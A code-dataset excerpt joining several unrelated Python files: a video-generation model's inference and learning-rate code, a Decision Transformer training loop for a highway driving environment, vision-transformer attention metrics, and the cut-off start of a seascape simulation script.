        """Test-time forward for one frame; keeps the generated-frame
        history in self.fake_B_prev between calls."""
        with torch.no_grad():
            real_A, real_B = self.encode_input(input_A, input_B)
            self.is_first_frame = not hasattr(self, 'fake_B_prev') or self.fake_B_prev is None
            if self.is_first_frame:
                if self.opt.no_first_img:
                    fake_B_prev = Variable(self.Tensor(self.bs, self.n_frames_G-1, self.opt.output_nc, self.height, self.width).zero_())
                else:
                    fake_B_prev = real_B[:,:self.n_frames_G-1,...]
                self.fake_B_prev = fake_B_prev[0]
            _, _, _, h, w = real_A.size()
            real_As_reshaped = real_A[0,:self.n_frames_G].view(1, -1, h, w)
            fake_B_prevs_reshaped = self.fake_B_prev.view(1, -1, h, w)
            fake_B = self.netG.forward(real_As_reshaped, fake_B_prevs_reshaped, self.opt.isTrain)
            # slide the history window: drop oldest, append the new frame
            self.fake_B_prev = torch.cat([self.fake_B_prev[1:,...], fake_B])
            return fake_B, real_A[0, -1]

    def concatenate_tensors(self, tensors, dim=0):
        """Concatenate two tensors (or parallel lists of tensors) along
        dim; if either side is None, return the other unchanged."""
        if tensors[0] is not None and tensors[1] is not None:
            if isinstance(tensors[0], list):
                tensors_cat = []
                for i in range(len(tensors[0])):
                    tensors_cat.append(self.concatenate_tensors([tensors[0][i], tensors[1][i]], dim=dim))
                return tensors_cat
            return torch.cat([tensors[0], tensors[1]], dim=dim)
        elif tensors[0] is not None:
            return tensors[0]
        else:
            return tensors[1]

    def save(self, label):
        """Save the generator checkpoint under the given label."""
        self.save_network(self.netG, 'G', label, self.gpu_ids)

    def update_learning_rate(self, epoch):
        """Linearly decay the learning rate over the last niter_decay epochs."""
        lr = self.opt.lr * (1 - (epoch - self.opt.niter) / self.opt.niter_decay)
        for param_group in self.optimizer_G.param_groups:
            param_group['lr'] = lr
        print('update learning rate: %f -> %f' % (self.old_lr, lr))
        self.old_lr = lr
| michaildoukas/head2head | models/head2head_model.py | head2head_model.py | py | 15,353 | python | en | code | 286 | github-code | 90 |
70983566056 | import numpy as np
import random
import torch
import wandb
from pipelines.evaluation.evaluate_episodes import evaluate_episode_rtg
from pipelines.training.seq_trainer import SequenceTrainer
from modules.decision_transformer import DecisionTransformer
from prettytable import PrettyTable
def count_parameters(model):
    """Print a per-module table of trainable parameter counts and
    return the total number of trainable parameters in *model*."""
    table = PrettyTable(["Modules", "Parameters"])
    total = 0
    for module_name, tensor in model.named_parameters():
        # frozen parameters are excluded from both table and total
        if tensor.requires_grad:
            n = tensor.numel()
            table.add_row([module_name, n])
            total += n
    print(table)
    print(f"Total Trainable Params: {total}")
    return total
def discount_cumsum(x, gamma):
    """
    Compute discounted cumulative sums of future reward:
    out[t] = x[t] + gamma * out[t + 1], with out[-1] = x[-1].
    adopted from https://github.com/kzl/decision-transformer/blob/master/gym/experiment.py
    """
    out = np.zeros_like(x)
    out[-1] = x[-1]
    # walk backwards so each entry can reuse the one after it
    for t in range(x.shape[0] - 2, -1, -1):
        out[t] = x[t] + gamma * out[t + 1]
    return out
def train(config, sequences, continue_training=False):
"""
Train a decision transformer on a dataset.
:param config: training configuration
:param sequences: list containing [sequence1, sequence2, ..., sequenceN]
sequence: dict containing {'states': np.array([state1, state2, ..., stateT]),
'actions': np.array([action1, action2, ..., actionT]),
'rewards': np.array([reward1, reward2, ..., rewardT])}
states: np.array of shape (T, *state_dim)
actions: np.array of shape (T, *action_dim)
rewards: np.array of shape (T, )
'dones': np.array([0,0, ..., 1])} -> trivial for our case as we always have one
scene for each episode. Dones is also not used in experiments.
code partially adapted from https://github.com/kzl/decision-transformer/blob/master/gym/experiment.py
"""
assert sequences is not None, 'No sequences provided for training.'
device = config['device']
act_dim = np.squeeze(sequences[0]['actions'].shape[1:])
state_dim = np.squeeze(sequences[0]['states'].shape[1:])
max_ep_len = max([len(path['states']) for path in sequences]) # take it as the longest trajectory
scale = np.mean([len(path['states']) for path in sequences]) # scale for rtg
# train-eval split
eval_size = config.get('eval_size', 500)
eval_sequences = sequences[:eval_size]
sequences = sequences[eval_size:]
# save all sequence information into separate lists
states, traj_lens, returns = [], [], []
for path in sequences:
if config['mode'] == 'delayed': # delayed: all rewards moved to end of trajectory
path['rewards'][-1] = path['rewards'].sum()
path['rewards'][:-1] = 0.
states.append(path['states'])
traj_lens.append(len(path['states']))
returns.append(path['rewards'].sum())
traj_lens, returns = np.array(traj_lens), np.array(returns)
# used for input normalization
input_type = config.get('input_type', 'coord')
states = np.concatenate(states, axis=0)
if input_type == 'grayscale':
# no normalization needed for cnn
state_mean, state_std = np.array(50), np.array(100)
else:
state_mean, state_std = np.mean(states, axis=0), np.std(states, axis=0) + 1e-6
state_mean[[0,5,10,15,20]] = 0
state_std[[0,5,10,15,20]] = 1
num_timesteps = sum(traj_lens)
print('=' * 50)
print(f'Starting new experiment: {config["experiment_name"]}')
print(f'{len(traj_lens)} trajectories, {num_timesteps} timesteps found')
print(f'Average return: {np.mean(returns):.2f}, std: {np.std(returns):.2f}')
print(f'Max return: {np.max(returns):.2f}, min: {np.min(returns):.2f}')
print('=' * 50)
K = config['context_length']
batch_size = config['batch_size']
num_eval_episodes = config['num_eval_episodes']
pct_traj = config['pct_traj']
# only train on top pct_traj trajectories (for %BC experiment)
num_timesteps = max(int(pct_traj * num_timesteps), 1)
sorted_inds = np.argsort(returns) # lowest to highest return
num_trajectories = 1
timesteps = traj_lens[sorted_inds[-1]]
ind = len(sequences) - 2
while ind >= 0 and timesteps + traj_lens[sorted_inds[ind]] <= num_timesteps:
timesteps += traj_lens[sorted_inds[ind]]
num_trajectories += 1
ind -= 1
sorted_inds = sorted_inds[-num_trajectories:]
# used to reweight sampling so we sample according to timesteps instead of trajectories
p_sample = traj_lens[sorted_inds] / sum(traj_lens[sorted_inds])
def get_batch(batch_size=256, max_len=K, eval=False):
batch_inds = np.random.choice(
np.arange(num_trajectories),
size=batch_size,
replace=True,
# p=p_sample, # reweights so we sample according to timesteps
) if not eval else np.arange(len(eval_sequences))
if eval:
batch_size = len(eval_sequences)
s, a, r, d, rtg, timesteps, mask = [], [], [], [], [], [], []
for i in range(batch_size):
traj = sequences[int(sorted_inds[batch_inds[i]])] if not eval else eval_sequences[batch_inds[i]]
si = random.randint(1, traj['rewards'].shape[0] - 1)
# get sequences from dataset
s.append(traj['states'][max(si - max_len, 0):si].reshape(1, -1, state_dim))
a.append(traj['actions'][max(si - max_len, 0):si].reshape(1, -1, act_dim))
r.append(traj['rewards'][max(si - max_len, 0):si].reshape(1, -1, 1))
if 'terminals' in traj:
d.append(traj['terminals'][max(si - max_len, 0):si].reshape(1, -1))
else:
d.append(traj['dones'][max(si - max_len, 0):si].reshape(1, -1))
timesteps.append(np.arange(max(si - max_len, 0), max(si - max_len, 0) + s[-1].shape[1]).reshape(1, -1))
timesteps[-1][timesteps[-1] >= max_ep_len] = max_ep_len - 1 # padding cutoff
rtg.append(
discount_cumsum(traj['rewards'][max(si - max_len, 0):si], gamma=1.)[:s[-1].shape[1] + 1].reshape(1, -1,
1))
if rtg[-1].shape[1] <= s[-1].shape[1]:
rtg[-1] = np.concatenate([rtg[-1], np.zeros((1, 1, 1))], axis=1)
# padding and state + reward normalization
tlen = s[-1].shape[1]
s[-1] = (s[-1] - state_mean) / state_std
s[-1] = np.concatenate([np.zeros((1, max_len - tlen, state_dim)), s[-1]], axis=1)
a[-1] = np.concatenate([np.ones((1, max_len - tlen, act_dim)) * 0, a[-1]], axis=1)
r[-1] = np.concatenate([np.zeros((1, max_len - tlen, 1)), r[-1]], axis=1)
d[-1] = np.concatenate([np.ones((1, max_len - tlen)) * 2, d[-1]], axis=1)
rtg[-1] = np.concatenate([np.zeros((1, max_len - tlen, 1)), rtg[-1]], axis=1) / scale
timesteps[-1] = np.concatenate([np.zeros((1, max_len - tlen)), timesteps[-1]], axis=1)
mask.append(np.concatenate([np.zeros((1, max_len - tlen)), np.ones((1, tlen))], axis=1))
s = torch.from_numpy(np.concatenate(s, axis=0)).to(dtype=torch.float32, device=device)
a = torch.from_numpy(np.concatenate(a, axis=0)).to(dtype=torch.float32, device=device)
r = torch.from_numpy(np.concatenate(r, axis=0)).to(dtype=torch.float32, device=device)
d = torch.from_numpy(np.concatenate(d, axis=0)).to(dtype=torch.long, device=device)
rtg = torch.from_numpy(np.concatenate(rtg, axis=0)).to(dtype=torch.float32, device=device)
timesteps = torch.from_numpy(np.concatenate(timesteps, axis=0)).to(dtype=torch.long, device=device)
mask = torch.from_numpy(np.concatenate(mask, axis=0)).to(device=device)
return s, a, r, d, rtg, timesteps, mask
# def get_batch(batch_size=256, max_len=K):
# batch_inds = np.random.choice(
# np.arange(num_trajectories),
# size=batch_size,
# replace=True,
# p=p_sample, # reweights so we sample according to timesteps
# )
#
# s, a, r, d, rtg, timesteps, mask = [], [], [], [], [], [], []
# for i in range(batch_size):
# traj = sequences[int(sorted_inds[batch_inds[i]])]
# si = random.randint(0, traj['rewards'].shape[0] - 1)
#
# # get sequences from dataset
# s.append(traj['states'][si:si + max_len].reshape(1, -1, state_dim))
# a.append(traj['actions'][si:si + max_len].reshape(1, -1, act_dim))
# r.append(traj['rewards'][si:si + max_len].reshape(1, -1, 1))
# if 'terminals' in traj:
# d.append(traj['terminals'][si:si + max_len].reshape(1, -1))
# else:
# d.append(traj['dones'][si:si + max_len].reshape(1, -1))
# timesteps.append(np.arange(si, si + s[-1].shape[1]).reshape(1, -1))
# timesteps[-1][timesteps[-1] >= max_ep_len] = max_ep_len - 1 # padding cutoff
# rtg.append(discount_cumsum(traj['rewards'][si:], gamma=1.)[:s[-1].shape[1] + 1].reshape(1, -1, 1))
# if rtg[-1].shape[1] <= s[-1].shape[1]:
# rtg[-1] = np.concatenate([rtg[-1], np.zeros((1, 1, 1))], axis=1)
#
# # padding and state + reward normalization
# tlen = s[-1].shape[1]
# s[-1] = np.concatenate([np.zeros((1, max_len - tlen, state_dim)), s[-1]], axis=1)
# s[-1] = (s[-1] - state_mean) / state_std
# a[-1] = np.concatenate([np.ones((1, max_len - tlen, act_dim)) * -10., a[-1]], axis=1)
# r[-1] = np.concatenate([np.zeros((1, max_len - tlen, 1)), r[-1]], axis=1)
# d[-1] = np.concatenate([np.ones((1, max_len - tlen)) * 2, d[-1]], axis=1)
# rtg[-1] = np.concatenate([np.zeros((1, max_len - tlen, 1)), rtg[-1]], axis=1) / scale
# timesteps[-1] = np.concatenate([np.zeros((1, max_len - tlen)), timesteps[-1]], axis=1)
# mask.append(np.concatenate([np.zeros((1, max_len - tlen)), np.ones((1, tlen))], axis=1))
#
# s = torch.from_numpy(np.concatenate(s, axis=0)).to(dtype=torch.float32, device=device)
# a = torch.from_numpy(np.concatenate(a, axis=0)).to(dtype=torch.float32, device=device)
# r = torch.from_numpy(np.concatenate(r, axis=0)).to(dtype=torch.float32, device=device)
# d = torch.from_numpy(np.concatenate(d, axis=0)).to(dtype=torch.long, device=device)
# rtg = torch.from_numpy(np.concatenate(rtg, axis=0)).to(dtype=torch.float32, device=device)
# timesteps = torch.from_numpy(np.concatenate(timesteps, axis=0)).to(dtype=torch.long, device=device)
# mask = torch.from_numpy(np.concatenate(mask, axis=0)).to(device=device)
#
# return s, a, r, d, rtg, timesteps, mask
    def eval_episodes(target_rew):
        # Build an evaluation closure for one target return value.
        # The returned fn(model) rolls out `num_eval_episodes` episodes with the
        # return-to-go conditioning fixed to `target_rew` and reports summary stats.
        # Relies on closure variables of the enclosing training function:
        # num_eval_episodes, config, state_dim, act_dim, state_mean, state_std, device.
        def fn(model):
            returns, lengths, crashes = [], [], []
            for _ in range(num_eval_episodes):
                with torch.no_grad():
                    ret, length, crash = evaluate_episode_rtg(
                        config['env'],
                        state_dim,
                        act_dim,
                        model,
                        state_mean=state_mean,
                        state_std=state_std,
                        device=device,
                        target_return=target_rew,
                        render=config['eval_render'],)
                    returns.append(ret)
                    lengths.append(length)
                    crashes.append(crash)
            # keys are prefixed with the target so several targets can be logged side by side
            return {
                f'target_{target_rew}_return_mean': np.mean(returns),
                f'target_{target_rew}_return_std': np.std(returns),
                f'target_{target_rew}_length_mean': np.mean(lengths),
                f'target_{target_rew}_length_std': np.std(lengths),
                f'target_{target_rew}_not_crashed (out of {num_eval_episodes} runs)': np.sum(crashes),
            }
        return fn
    print("state_dim:", state_dim, " act_dim:", act_dim, " K:", K, " max_ep_len:", max_ep_len, " scale:", scale)
    # Build the Decision Transformer; context length K and episode cap come from the experiment config.
    model = DecisionTransformer(
        state_dim=state_dim,
        act_dim=act_dim,
        max_length=K,
        max_ep_len=max_ep_len,
        action_tanh=config['action_tanh'],
        hidden_size=config['embed_dim'],
        n_layer=config['n_layer'],
        n_head=config['n_head'],
        state_encoder=config.get('state_encoder', None),
        in_shape=config.get('in_shape', None),
        n_inner=4 * config['embed_dim'],
        activation_function=config['activation_function'],
        n_positions=1024,
        resid_pdrop=config['dropout'],
        attn_pdrop=config['dropout'],
    )
    optimizer = torch.optim.AdamW(
        model.parameters(),
        lr=config['learning_rate'],
        weight_decay=config['weight_decay'],
    )
    if continue_training:
        # resume: both state dicts were stashed in the config by a previous run
        # NOTE(review): this branch never moves the model to `device`, while the
        # fresh-start branch below does - confirm resumed runs land on the right device.
        model.load_state_dict(config['model'])
        optimizer.load_state_dict(config['optimizer'])
    else:
        model = model.to(device=device)
    # linear LR warmup over the first `warmup_steps` optimizer steps, then constant
    warmup_steps = config['warmup_steps']
    scheduler = torch.optim.lr_scheduler.LambdaLR(
        optimizer,
        lambda steps: min((steps+1)/warmup_steps, 1)
    )
    trainer = SequenceTrainer(
        model=model,
        optimizer=optimizer,
        batch_size=batch_size,
        get_batch=get_batch,
        scheduler=scheduler,
        loss_fn=config['loss_fn'],
        eval_fns=[eval_episodes(tar) for tar in config['env_targets']],
        err_fn=config['err_fn']
    )
    if config['log_to_wandb']:
        wandb.init(
            name=config["experiment_name"],
            group=config["group_name"],
            project='highway-decision-transformer',
            config={}#config
        )
    # wandb.watch(model) # wandb has some bug
    count_parameters(model)
    # Main loop: train one iteration, evaluate on every target return, checkpoint
    # whenever the mean evaluation return improves, plus every 10 iterations.
    max_ret = 0
    for iteration in range(config['max_iters']):
        outputs = trainer.train_iteration(num_steps=config['num_steps_per_iter'], iter_num=iteration+1, print_logs=True)
        eval_rets = [outputs[f'evaluation/target_{target_rew}_return_mean'] for target_rew in config['env_targets']]
        mean_ret = np.mean(eval_rets)
        if mean_ret > max_ret:
            max_ret = mean_ret
            if config['log_highest_return']:
                print("Saving model with highest mean return so far", mean_ret)
                checkpoint = {
                    'model': model.state_dict(),
                    'optimizer': optimizer.state_dict(),
                }
                torch.save(checkpoint, f'saved_models/best-{round(max_ret, 2)}-checkpoint-{config["experiment_name"]}.pth')
        if iteration%10 == 0 and iteration > 0:
            checkpoint = {
                'model': model.state_dict(),
                'optimizer': optimizer.state_dict(),
            }
            torch.save(checkpoint, f'saved_models/iter-{iteration}-checkpoint-{config["experiment_name"]}.pth')
        if config['log_to_wandb']:
            wandb.log(outputs)
    return model, optimizer, scheduler
| caixunshiren/Highway-Decision-Transformer | pipelines/train_dt.py | train_dt.py | py | 15,371 | python | en | code | 15 | github-code | 90 |
24028142293 | """
###########################################################################
Collection of metrics for transformers, designed to be computed
incrementally over batches
Written by: Matthew Walmer
###########################################################################
"""
import matplotlib.pyplot as plt
import torch
import numpy as np
from cka.utils import cluster_metric
########################################
# track the average attention distance per head, based on the attention distance metric proposed in
# "Do Vision Transformers See Like Convolutional Neural Networks" (Raghu et al.)
class AttentionDistance():
    """Average spatial attention distance per head, following the attention
    distance metric proposed in "Do Vision Transformers See Like Convolutional
    Neural Networks" (Raghu et al.). Accumulates incrementally over batches."""
    def __init__(self, debug=False):
        self.metric_name = 'avg-att-dist'
        self.results = []
        self.distance_template = None  # [1,1,1,nt,nt] pairwise token distances
        self.edge_len = None           # tokens per side of the (square) grid
        self.debug = debug
        self.device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
    # treat tokens as existing on a [0,1] square. convert their
    # integer position to a spatial position
    def convert_to_xy(self, i):
        x = i % self.edge_len
        y = int((i-x)/self.edge_len)
        x /= (self.edge_len - 1)
        y /= (self.edge_len - 1)
        return x, y
    # pre-calculate distances between all token pairs; tokens live on a [0,1]
    # square, so this requires a square patch grid
    def prep_distance_template(self, attentions):
        if self.distance_template is not None:
            return
        print('Preparing Distance Template')
        att = attentions[:,:,:,1:,1:] # Remove CLS token
        self.edge_len = int(np.sqrt(att.shape[3]))
        if self.edge_len * self.edge_len != att.shape[3] or self.edge_len * self.edge_len != att.shape[4]:
            print('ERROR: attention distance requires square token layout')
            exit(-1)
        nt = att.shape[3]
        convert_template = np.zeros([nt, 2])
        for i in range(nt):
            x, y = self.convert_to_xy(i)
            convert_template[i,:] = [x, y]
        distance_template = torch.zeros([nt, nt])
        for i in range(nt):
            xy = convert_template[i,:]
            d = convert_template - xy
            d = np.square(d)
            d = np.sum(d, axis=1)
            d = np.sqrt(d)
            distance_template[i,:] = torch.from_numpy(d)
        if self.debug: # visualize distance maps
            # BUGFIX: this branch used the undefined bare name `edge_len`
            # (NameError) - it must be self.edge_len. The probe positions are
            # hard-coded for a 60x60 grid, so skip any that fall outside nt.
            pos_sel = [0, 30, 1770, 3570, 3599]
            for p in pos_sel:
                if p >= nt:
                    continue
                dis = distance_template[p,:]
                dis = dis.reshape(self.edge_len, self.edge_len).cpu().numpy()
                fname = 'debug_%i.png'%p
                plt.imsave(fname=fname, arr=dis, format='png')
        self.distance_template = distance_template.unsqueeze(0).unsqueeze(0).unsqueeze(0).to(self.device)
    def add(self, attentions, labels):
        # attentions: [batch, blocks, heads, src_tokens, dst_tokens]; labels unused
        self.prep_distance_template(attentions)
        att = attentions[:,:,:,1:,1:] # Remove CLS token
        att_sum = torch.sum(att, dim=4, keepdim=True)
        # handle empty case (all att on cls token)
        att_nul = (att_sum == 0).to(torch.long)
        att_sum += att_nul
        att = att / att_sum
        d = torch.sum(att * self.distance_template, dim=4)
        d = torch.mean(d, dim=3)
        self.results.append(d.cpu().numpy())
    def get_results(self):
        # [num_images, blocks, heads]
        return np.concatenate(self.results, axis=0)
########################################
class PositionDeviation():
    """Per-head spread of attention across source-token positions: the standard
    deviation over source tokens, averaged over destination tokens."""
    def __init__(self):
        self.metric_name = 'stdev-over-token-pos'
        self.results = []
    def add(self, attentions, labels):
        # drop the CLS row and column; keep only spatial-token attention
        spatial = attentions[:, :, :, 1:, 1:]
        per_dest = spatial.std(dim=3)          # deviation across source positions
        self.results.append(per_dest.mean(dim=3).cpu().numpy())
    def get_results(self):
        return np.concatenate(self.results, axis=0)
########################################
class SpatialCLSAttention():
    """Average attention placed BY the spatial tokens ON the CLS token."""
    def __init__(self):
        self.metric_name = 'spatial-cls-att'
        self.results = []
    def add(self, attentions, labels):
        # sources 1: (spatial tokens), destination 0 (the CLS token).
        # BUGFIX: was attentions[:,:,:,1:,1], which reads the first *spatial*
        # destination - CLS is index 0 everywhere else in this module.
        att = attentions[:, :, :, 1:, 0]
        v = torch.mean(att, dim=3)
        self.results.append(v.cpu().numpy())
    def get_results(self):
        return np.concatenate(self.results, axis=0)
########################################
# determine if the sparse attention patterns in the late layers of CLIP and TIMM
# encode semantic "shortcuts" by using the patterns directly as features and running
# semantic cluster purity analysis. This metric is still experimental
class AttentionPatternShortcuts():
    # EXPERIMENTAL: tests whether late-layer sparse attention patterns encode
    # semantic "shortcuts" by treating the patterns themselves as features and
    # running a semantic cluster-purity analysis over them.
    def __init__(self):
        self.metric_name = 'att-pat-shortcuts'
        self.att_pats = []  # one feature vector per image
        self.labs = []      # matching class labels
    def add(self, attentions, labels):
        # attentions: [batch, blocks, heads, src_tokens, dst_tokens]
        bs = attentions.shape[0]
        for i in range(bs):
            # att = attentions[i,:,:,1:,1:] # remove CLS token
            att = attentions[i,...] # don't remove the CLS token
            att = torch.mean(att, dim=2) # average over source positions
            # option 1: focus on a single head to test the hypothesis
            # att = att[-2, 0, :]
            # option 2: average per-block (second-to-last block only)
            att = att[-2, :, :]
            att = torch.mean(att, dim=0)
            # store attention patterns and labels
            self.att_pats.append(att.cpu().numpy())
            self.labs.append(labels[i].cpu())
    def get_results(self):
        # NOTE: experimental dead end - prints cluster metrics and then
        # terminates the whole process via exit(); it never returns results.
        att_pats = np.stack(self.att_pats, axis=0)
        all_labs = np.array(self.labs)
        print(att_pats.shape)
        print(all_labs.shape)
        print('running clustering analysis')
        nmi, ari, pur = cluster_metric(50, att_pats, all_labs)
        exit()
        return None
        # return np.concatenate(self.results, axis=0)
########################################
'''
average amount of attention ON each token
also equivalent to averaging all attention maps over
the source-token dimension. Runs in 4 modes:
all - average attention of all source tokens
cls - take only the cls token
spc - take only the spatial tokens
spcpure - take only the spatial tokens and remove
cls token as a destination token (normalize
for the lost attention mass)
aggregated maps include the cls token in the
set of destination-tokens, which can then be
included or excluded in further plots
'''
class AvgAttentionOnToken():
    """Average amount of attention ON each destination token (see the mode
    descriptions in the comment block above: all / cls / spc / spcpure)."""
    def __init__(self, mode='all'):
        assert mode in ['all', 'cls', 'spc', 'spcpure']
        if mode == 'all':
            self.metric_name = 'avg-att-on-token'
        else:
            self.metric_name = 'avg-%s-att-on-token'%mode
        self.mode = mode
        self.average_acc = None  # running sum of per-image maps [blocks, heads, tokens]
        self.count = 0           # number of images accumulated
    def add(self, attentions, labels):
        # attentions: [batch, blocks, heads, src_tokens, dst_tokens]; token 0 is CLS
        self.count += attentions.shape[0]
        if self.mode == 'all':
            attentions = torch.mean(attentions, dim=3)
        elif self.mode == 'spc':
            attentions = attentions[:,:,:,1:,:]  # drop CLS as a source token
            attentions = torch.mean(attentions, dim=3)
        elif self.mode == 'spcpure':
            # BUGFIX: clone before zeroing the CLS column - the slice is a view,
            # so writing into it used to mutate the caller's tensor in place.
            attentions = attentions[:,:,:,1:,:].clone()
            attentions[:,:,:,:,0] = 0  # remove all attention on CLS tokens
            att_sum = torch.sum(attentions, dim=4, keepdim=True)
            # handle empty case (all att was on the cls token): avoid div-by-zero
            att_nul = (att_sum == 0).to(torch.long)
            att_sum += att_nul
            attentions = attentions / att_sum  # normalize for removed attention mass
            attentions = torch.mean(attentions, dim=3)
        else: # cls
            attentions = attentions[:,:,:,0,:]
        avg_att = torch.sum(attentions, dim=0)
        avg_att = avg_att.cpu().numpy()
        if self.average_acc is None:
            self.average_acc = avg_att
        else:
            self.average_acc += avg_att
    def get_results(self):
        # per-image average map, shape [blocks, heads, tokens]
        return self.average_acc / self.count
########################################
'''
Measure the average attention positions of all spatial tokens, but now
the heat maps are shifted so the current token is always aligned with
the center. CLS token is removed and the maps are normalized to account
for the lost attention mass.
Closest match in AvgAttentionOnToken would be spcpure mode, since this
method remove the cls token completely and normalizes for the lost mass
Tf the original token grid is KxK, the output of this method will be
(2K-1)x(2K-1).
'''
class AvgAlignedAttentionOnToken():
    # Average attention map over spatial tokens, with each source token's map
    # shifted so the source sits at the center; for a KxK grid the accumulated
    # output is (2K-1)x(2K-1). CLS is dropped and maps renormalized (see the
    # module docstring above this class).
    def __init__(self):
        self.metric_name = 'avg-aligned-att-on-token'
        self.edge_len = None  # tokens per side of the square grid
        self.c = None         # NOTE(review): never used anywhere - confirm it can be removed
        self.average_acc = None  # padded accumulator [blocks, heads, 2K-1, 2K-1]
        self.count = 0
        # track null events (all attention on CLS token)
        self.null_count = 0
        self.null_imgc = 0
        self.null_tracker = None
    # convert direct token idx to i,j coordinates (i=down, j=across)
    def convert_to_ij(self, idx):
        j = idx % self.edge_len
        i = int((idx-j)/self.edge_len)
        return i, j
    def add(self, attentions, labels):
        # Remove CLS token from source and destination, and normalize for lost attention mass
        att = attentions[:,:,:,1:,1:]
        att_sum = torch.sum(att, dim=4, keepdim=True)
        # handle and track empty case (all att on cls token)
        att_nul = (att_sum == 0).to(torch.long)
        nul_img = (torch.sum(att_nul, dim=(1,2,3,4)) > 0)
        self.null_count += torch.sum(att_nul)
        self.null_imgc += torch.sum(nul_img)
        if self.null_tracker is None:
            self.null_tracker = torch.sum(att_nul, dim=(0,4))
        else:
            self.null_tracker += torch.sum(att_nul, dim=(0,4))
        att_sum += att_nul
        # normalize for removed attention mass
        att = att / att_sum
        # square-ify the token grid (requires a square token layout)
        if self.edge_len is None:
            self.edge_len = int(np.sqrt(att.shape[3]))
            if self.edge_len * self.edge_len != att.shape[3] or self.edge_len * self.edge_len != att.shape[4]:
                print('ERROR: attention distance requires square token layout')
                exit(-1)
        att_sq = torch.reshape(att, [att.shape[0], att.shape[1], att.shape[2], att.shape[3], self.edge_len, self.edge_len]).cpu().numpy()
        # initialize attention maps with padding
        if self.average_acc is None:
            w = (self.edge_len * 2) - 1
            self.average_acc = np.zeros([att.shape[1], att.shape[2], w, w], dtype=att_sq.dtype)
        # accumulate: each source token's map is summed over the batch, then
        # added into the padded accumulator shifted so the source is centered
        for idx in range(att.shape[3]):
            cur = att_sq[:, :, :, idx, :, :]
            cur = np.sum(cur, axis=0)
            i, j = self.convert_to_ij(idx)
            e = self.edge_len
            self.average_acc[:,:,e-i-1:e-i-1+e,e-j-1:e-j-1+e] += cur
            # NOTE(review): count advances once per source token, not per image,
            # while the accumulator sums over the batch - for batch sizes > 1 the
            # final division scales with batch size; confirm intended usage.
            self.count += 1
    def get_results(self):
        # report null (all-attention-on-CLS) statistics before returning the average
        if self.null_count > 0:
            print('Null Report:')
            print('avg-aligned-att-on-token')
            print('null count: %i'%self.null_count)
            print('null images: %i'%self.null_imgc)
            print('null tokens: %i'%torch.sum(self.null_tracker > 0))
            print('null heads:')
            print(torch.sum(self.null_tracker, dim=2))
        return self.average_acc / self.count
########################################
# average amount of attention ON each token separated by image class, to test if some heads/tokens
# are sensitive to particular object classes
class AvgAttentionOnTokenPerClass():
    """Average attention on each token, separated by image class, to probe
    whether some heads/tokens are sensitive to particular object classes."""
    def __init__(self, num_class=50):
        self.metric_name = 'avg-att-on-token-per-class'
        self.average_accs = {}  # class id -> running sum [blocks, heads, tokens]
        self.counts = {}        # class id -> number of images seen
        self.nc = num_class
        for i in range(self.nc):
            self.average_accs[i] = None
            self.counts[i] = 0
    def add(self, attentions, labels):
        # attentions: [batch, blocks, heads, src_tokens, dst_tokens]
        b = attentions.shape[0]
        for i in range(b):
            l = int(labels[i])
            avg_att = attentions[i,...]
            avg_att = torch.mean(avg_att, dim=2)  # average over source tokens
            avg_att = avg_att.cpu().numpy()
            if self.average_accs[l] is None:
                self.average_accs[l] = avg_att
            else:
                self.average_accs[l] += avg_att
            self.counts[l] += 1
    def get_results(self):
        # BUGFIX: previously assumed class 0 had been observed (crashed on None)
        # and divided by zero for any unseen class; unseen classes now yield zeros.
        temp = next((acc for acc in self.average_accs.values() if acc is not None), None)
        if temp is None:
            return None  # nothing accumulated yet
        nb = temp.shape[0]
        nh = temp.shape[1]
        nt = temp.shape[2]
        ret = np.zeros([self.nc, nb, nh, nt], dtype=temp.dtype)
        for i in range(self.nc):
            if self.counts[i] > 0:
                ret[i,...] = self.average_accs[i] / self.counts[i]
        return ret
########################################
# measure standard deviation over heads, a per-block metric
class HeadDeviation():
    """Per-block disagreement between heads: the standard deviation of spatial
    attention across the head dimension, averaged over all token pairs."""
    def __init__(self):
        self.metric_name = 'stdev-over-head'
        self.results = []
    def add(self, attentions, labels):
        spatial = attentions[:, :, :, 1:, 1:]     # drop CLS row and column
        spread = spatial.std(dim=2).mean(dim=(2, 3))
        self.results.append(spread.cpu().numpy())
    def get_results(self):
        return np.concatenate(self.results, axis=0)
########################################
# POST PROCESSING METRICS
########################################
# Metrics that are derived by directly post-processing the results of other metrics
# typically reducing lower-level metrics to higher-level metrics
# take the per-class average attention maps and compute the average stdev over class
# input is the result of AvgAttentionOnTokenPerClass
def deviation_by_class(result):
    """Average (over tokens) of the per-position standard deviation across
    classes, for the output of AvgAttentionOnTokenPerClass."""
    spread = np.std(result, axis=0, keepdims=True)
    return spread.mean(axis=3)
# take in the result for 'avg-aligned-att-on-token' and compute the average center
# of attention for each block and the average offset distance
def average_att_offset(result):
    """For the output of 'avg-aligned-att-on-token' (shape [blocks, heads, w, w]),
    compute each (block, head)'s average center of attention in [-1, 1]^2
    coordinates and its distance from the aligned center.

    Returns (d, cx, cy), each of shape [blocks, heads].
    BUGFIX: normalization previously used an in-place `att /= ...` on a view of
    `result`, silently mutating the caller's array."""
    nb = result.shape[0]
    nh = result.shape[1]
    nt = result.shape[2]
    # distance templates: x varies along columns, y along rows, spanning [-1, 1]
    dtx = np.zeros([nt, nt])
    dty = np.zeros([nt, nt])
    for i in range(nt):
        v = 2 * (float(i)/(nt-1)) - 1
        dtx[:,i] = v
        dty[i,:] = v
    # compute average centers
    cx = np.zeros([nb, nh])
    cy = np.zeros([nb, nh])
    d = np.zeros([nb, nh])
    for b in range(nb):
        for h in range(nh):
            # make sure the heat map sums to 1
            # special case: if attention was fully on the CLS token the map is
            # all zeros - skip normalization to avoid dividing by zero
            att = result[b,h,...]
            div = np.sum(att)
            if div > 0:
                att = att / div  # out-of-place: leaves `result` untouched
            cxbh = np.sum(np.multiply(att, dtx))
            cybh = np.sum(np.multiply(att, dty))
            d[b,h] = np.linalg.norm(np.array([cxbh, cybh]))
            cx[b,h] = cxbh
            cy[b,h] = cybh
    return d, cx, cy
41392218806 | import numpy as np
from scipy.stats import levy_stable
import scipy
import math
import random
import levy
from matplotlib import pyplot
def create_seascape_uniform(seascape_length, seascape_width, patches):
    # Stamp each prey patch onto a (seascape_length x seascape_width) torus,
    # jumping between patch placements with UNIFORMLY distributed step sizes
    # in a random direction. Returns the accumulated seascape array.
    patch_count = len(patches)  # NOTE(review): unused here - kept for symmetry with the levy variants
    patch_length = len(patches[0])
    if(seascape_length % patch_length != 0 or seascape_width % patch_length !=0):
